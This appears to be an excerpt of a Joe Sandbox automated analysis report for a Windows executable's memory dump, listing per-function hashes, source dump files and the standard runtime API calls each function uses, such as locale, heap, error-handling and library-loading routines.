                                                                                  • Opcode Fuzzy Hash: 31db45415bd8b84a699b03de4afdfbdb6800616cd27cfa35523224e36fc03502
                                                                                  • Instruction Fuzzy Hash: 78411725B1924321FA70FA2A691377AF6C07F91780F914575EE4D47BC5EE3CE400B622
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: acd2275a6c80eb91d33dd5139ac4f3b5409aa341ac76b2b834c9fd8d3d7e4b2c
                                                                                  • Instruction ID: ec636795949dad6d2ba79fd18380115f3966c6580cd18e4c9192f63f8e4e75bd
                                                                                  • Opcode Fuzzy Hash: acd2275a6c80eb91d33dd5139ac4f3b5409aa341ac76b2b834c9fd8d3d7e4b2c
                                                                                  • Instruction Fuzzy Hash: ABE1A136A08B8196F720EB65E4412EEB7A0F794788F818631DF8D53B52DF78E245E311
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF73A40492C: GetLastError.KERNEL32 ref: 00007FF73A40493B
                                                                                    • Part of subcall function 00007FF73A40492C: FlsGetValue.KERNEL32 ref: 00007FF73A404950
                                                                                    • Part of subcall function 00007FF73A40492C: SetLastError.KERNEL32 ref: 00007FF73A4049DB
                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF73A40EC83,?,00000000,00000092,?,?,00000000,?,00007FF73A402915), ref: 00007FF73A40E532
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                  • String ID:
                                                                                  • API String ID: 3029459697-0
                                                                                  • Opcode ID: 299e2fb3c39f1723234e1e9a30f7c01ce5d09dac68b119f8fefbba8bba3a8293
                                                                                  • Instruction ID: bdbd884e2b137ba97ebd30402328a179a4c632b692ca0380f59bfc99dedc9c38
                                                                                  • Opcode Fuzzy Hash: 299e2fb3c39f1723234e1e9a30f7c01ce5d09dac68b119f8fefbba8bba3a8293
                                                                                  • Instruction Fuzzy Hash: 9411357BA086419AFB10EF69E0422A8F7A1FB90B90F858131C629433C0DA38D5E1E711
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 4023145424-3303519982
                                                                                  • Opcode ID: 2193573eb62e0e349bac0217901461b891f751db6f69d9bcdbd2da4b2e5dc450
                                                                                  • Instruction ID: 0731a7d182a7a04fedd05d049e613cddff1a57a14a76fc459949424b8a37b43d
                                                                                  • Opcode Fuzzy Hash: 2193573eb62e0e349bac0217901461b891f751db6f69d9bcdbd2da4b2e5dc450
                                                                                  • Instruction Fuzzy Hash: 07C1F52AA0868265FB64EF6984023BAE7A0FB94788F814075DF8D876C4DF3CD505F712
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF73A40492C: GetLastError.KERNEL32 ref: 00007FF73A40493B
                                                                                    • Part of subcall function 00007FF73A40492C: FlsGetValue.KERNEL32 ref: 00007FF73A404950
                                                                                    • Part of subcall function 00007FF73A40492C: SetLastError.KERNEL32 ref: 00007FF73A4049DB
                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00007FF73A40E7F6), ref: 00007FF73A40EA83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocaleValue
                                                                                  • String ID:
                                                                                  • API String ID: 3796814847-0
                                                                                  • Opcode ID: 27a870d04b5633b0ce9003d67710837246028b62cd08f72254b1953ba3c47300
                                                                                  • Instruction ID: 4426c5cb790911bc90873a361194d749f2255626d7f94b52900516b6398c6858
                                                                                  • Opcode Fuzzy Hash: 27a870d04b5633b0ce9003d67710837246028b62cd08f72254b1953ba3c47300
                                                                                  • Instruction Fuzzy Hash: EF11BD35B1814253FB34E729E00367EE251FB98750F964231E62D037C0EE6DD8A0BB10
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF73A40492C: GetLastError.KERNEL32 ref: 00007FF73A40493B
                                                                                    • Part of subcall function 00007FF73A40492C: FlsGetValue.KERNEL32 ref: 00007FF73A404950
                                                                                    • Part of subcall function 00007FF73A40492C: SetLastError.KERNEL32 ref: 00007FF73A4049DB
                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF73A40EC3F,?,00000000,00000092,?,?,00000000,?,00007FF73A402915), ref: 00007FF73A40E5E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                  • String ID:
                                                                                  • API String ID: 3029459697-0
                                                                                  • Opcode ID: 388ee0737461765ef09b34f64180d27f0f64b5a2ec9b35637385c1be6d2a8eb3
                                                                                  • Instruction ID: 005cd3a23401eed37e3afafd992fd96714123ade5a66398df8aadff4deb15b6d
                                                                                  • Opcode Fuzzy Hash: 388ee0737461765ef09b34f64180d27f0f64b5a2ec9b35637385c1be6d2a8eb3
                                                                                  • Instruction Fuzzy Hash: 4301F576F082415AF710AB6AE4027B9F2D2EB507A0F868271D628872C4EF6C9491F711
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 1500699246-3303519982
                                                                                  • Opcode ID: 83ca80d9d4f9584a6a4f4fc1a54bd5d488d3e5bf467065ee0d380736a2b3f2d8
                                                                                  • Instruction ID: 4d9b5dc455ad69c29d330bfe612bf6f187a631a3cfd14043dc84a8c75c4246d9
                                                                                  • Opcode Fuzzy Hash: 83ca80d9d4f9584a6a4f4fc1a54bd5d488d3e5bf467065ee0d380736a2b3f2d8
                                                                                  • Instruction Fuzzy Hash: 38B10636A1864692FB64FF28D8026B9F391FB50B88F824271DA49836C8DF3CD549F751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapLast
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 485612231-3303519982
                                                                                  • Opcode ID: 8ca5f9b9afe2a1ab358cc5a1c228255cabf2ac0385a2a04a48b8430728c2505a
                                                                                  • Instruction ID: 2130caf0a2989a1690d7924b0774582292b6881755882c7141cf428c874d9e95
                                                                                  • Opcode Fuzzy Hash: 8ca5f9b9afe2a1ab358cc5a1c228255cabf2ac0385a2a04a48b8430728c2505a
                                                                                  • Instruction Fuzzy Hash: F741E266714A5592FF08DF2ED9155A9F3A1FB48FC0B8AA032EE0D87B58DE3CC041A300
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: 1da0440ed416fdd449553909bf9a1db47b46f554b6c3f078e270c30caa019559
                                                                                  • Instruction ID: d3eaca1be38dcb91c2fefb55ba2bcf73639a7b30bc8b202dce4278c29616b18b
                                                                                  • Opcode Fuzzy Hash: 1da0440ed416fdd449553909bf9a1db47b46f554b6c3f078e270c30caa019559
                                                                                  • Instruction Fuzzy Hash: 40B09268E07A06D2FA087B197C4321862A47F58780FD680B9C40C41320DF2C20B5A721
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: 7109f6d66ea2bcb3fcf48e369374f18d00b5ecf0dda747d50eb1d51b175624ba
                                                                                  • Instruction ID: c3b99c72790d5e324a1a485ddfa935f5d66412f39994faf5df24765011b8a09d
                                                                                  • Opcode Fuzzy Hash: 7109f6d66ea2bcb3fcf48e369374f18d00b5ecf0dda747d50eb1d51b175624ba
                                                                                  • Instruction Fuzzy Hash: 7A81D476A04A5196FB20EF29D48237DF360FB84B94F958636EE1E87794CF38D441A311
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: 80c9ba1454821e56d09626715f1adff33740e042ef6f704d56f420b68e0c08fa
                                                                                  • Instruction ID: 260bd86606c84d4a366c9f814dc5e5437804c92191b40727f8eb94314573a568
                                                                                  • Opcode Fuzzy Hash: 80c9ba1454821e56d09626715f1adff33740e042ef6f704d56f420b68e0c08fa
                                                                                  • Instruction Fuzzy Hash: AA612B2AE1C74376F764E92C9442639E681AF80370F9606B5D61E86AD1DE7CE800B722
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2579ee338d7137eaa34571bac64e97de0e4a0919a686233ee17fa3397aa3dd5e
                                                                                  • Instruction ID: 0c44706fb5431d4321810690d2506c60ea1e9686c8579e602d831c54cf725aae
                                                                                  • Opcode Fuzzy Hash: 2579ee338d7137eaa34571bac64e97de0e4a0919a686233ee17fa3397aa3dd5e
                                                                                  • Instruction Fuzzy Hash: 2CF06275B292999AEBE49F2CA843729B7D0F708384F90C07DD68D83F04DA7C90609F14
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 07dbe8be3fdfe9a3948dfa8428d32c069e3a053949d024d9b812c82a406bcec9
                                                                                  • Instruction ID: 76bde744b49ebdfddbea5cd3514622238e56c7ae9e024b06b75ca471ff24aeee
                                                                                  • Opcode Fuzzy Hash: 07dbe8be3fdfe9a3948dfa8428d32c069e3a053949d024d9b812c82a406bcec9
                                                                                  • Instruction Fuzzy Hash: 4EA0016A99A803E4FA48AB04A866460A320EB64352BE201B5E44D814A09E3CA450E220
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
                                                                                  • String ID: ", "$: "$|~fqVG
                                                                                  • API String ID: 4080386414-1771333729
                                                                                  • Opcode ID: e0687b416090407da58e5f28bfa2971eaf4c9ee23a2eb5180f1abe1b4521861a
                                                                                  • Instruction ID: 878f075f445f306433d2a3673cb677f45fd876dc5c628f019789ea34b8417aee
                                                                                  • Opcode Fuzzy Hash: e0687b416090407da58e5f28bfa2971eaf4c9ee23a2eb5180f1abe1b4521861a
                                                                                  • Instruction Fuzzy Hash: 9EF1E1B6B1AB42E1FF08EF65D4463ACA361EB44B88F804076DA4D07B99DF78D884D350
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm$|~fqVG
                                                                                  • API String ID: 849930591-748751075
                                                                                  • Opcode ID: ee1809c7fbfe8fe136b003fb3be94c9213cbc22be77ffdee26613d8d8fce83c2
                                                                                  • Instruction ID: 0616ca6138d3832e2978ab302623657504723e16b0d0760a7074f57ed1547896
                                                                                  • Opcode Fuzzy Hash: ee1809c7fbfe8fe136b003fb3be94c9213cbc22be77ffdee26613d8d8fce83c2
                                                                                  • Instruction Fuzzy Hash: 01D19E76D197839AFF20AF6594423ADA7A0FB44B88F504179EE4D57B99CF38E080E710
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF73A406B08,?,?,?,?,00007FF73A3FFFA9,?,?,?,?,00007FF73A3F6E60), ref: 00007FF73A40657C
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF73A406B08,?,?,?,?,00007FF73A3FFFA9,?,?,?,?,00007FF73A3F6E60), ref: 00007FF73A406588
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeLibraryProc
                                                                                  • String ID: api-ms-$ext-ms-$|~fqVG
                                                                                  • API String ID: 3013587201-1876307669
                                                                                  • Opcode ID: 289b252e76c797c21b5f023d4d7c5738725c70101b4476a1829e9950c1a11480
                                                                                  • Instruction ID: 3661dfa9f77419c99264911923151f2faca49cdd8503c53ab605fd5ac0169699
                                                                                  • Opcode Fuzzy Hash: 289b252e76c797c21b5f023d4d7c5738725c70101b4476a1829e9950c1a11480
                                                                                  • Instruction Fuzzy Hash: A0415839B19A0261FA16EB1AB8025B5E291BF05B90F964174DD0F87788EF3CE405B321
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorLast
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2506987500-3303519982
                                                                                  • Opcode ID: 69d50fb44b4381e2267c746501ea7923b0e6ce42c0241678fa123fbd6296f1a2
                                                                                  • Instruction ID: 19788de06487f502279ec9c4684450b90bee7fcefb4a8286c659e1b288e36410
                                                                                  • Opcode Fuzzy Hash: 69d50fb44b4381e2267c746501ea7923b0e6ce42c0241678fa123fbd6296f1a2
                                                                                  • Instruction Fuzzy Hash: C421B028B0C24761F958F77D6553139E1429FA47B0F9287B5D92E0BAC6DE6CA4407332
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiStringWide
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2829165498-3303519982
                                                                                  • Opcode ID: 5ee8c5b108fca4a97ddfb8b367f05df98f08852e8ccaf75ced40f6c020011866
                                                                                  • Instruction ID: 63d5a9253420216e94422cebf2993e2ea5fca1c7c2f65e48430b2f138a31fe7d
                                                                                  • Opcode Fuzzy Hash: 5ee8c5b108fca4a97ddfb8b367f05df98f08852e8ccaf75ced40f6c020011866
                                                                                  • Instruction Fuzzy Hash: 1F81D07AA1A74296FF20AF25A441279B691FF45BE8F940279EA1D43BD8DF3CD4049320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2081738530-3303519982
                                                                                  • Opcode ID: bf138b911cd8e884d20b3277601c18e0904331efa30289f53c243972f023fb2a
                                                                                  • Instruction ID: d1de3350242bc74605f43c5da6448bb70daeff16da24125287357f1aab12d21c
                                                                                  • Opcode Fuzzy Hash: bf138b911cd8e884d20b3277601c18e0904331efa30289f53c243972f023fb2a
                                                                                  • Instruction Fuzzy Hash: FF41933AA19B4691FE10EF25E442179B761FF85B90F8801B6EA8E037A5DF3CE445D720
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2081738530-3303519982
                                                                                  • Opcode ID: 2122288b5b25a0ed3ac52127f55f76d71ece30480fceaf66fc8f0ccfee7979f4
                                                                                  • Instruction ID: d819cf147b313d05a838181749605e9d518fc67d2839f3abef133d0c6d4bf748
                                                                                  • Opcode Fuzzy Hash: 2122288b5b25a0ed3ac52127f55f76d71ece30480fceaf66fc8f0ccfee7979f4
                                                                                  • Instruction Fuzzy Hash: 0731A72AA19A43A1FE14FF15E4421BAE360FF54BA4F880175DA5D037A9DF3CE445E720
                                                                                  APIs
                                                                                  Strings
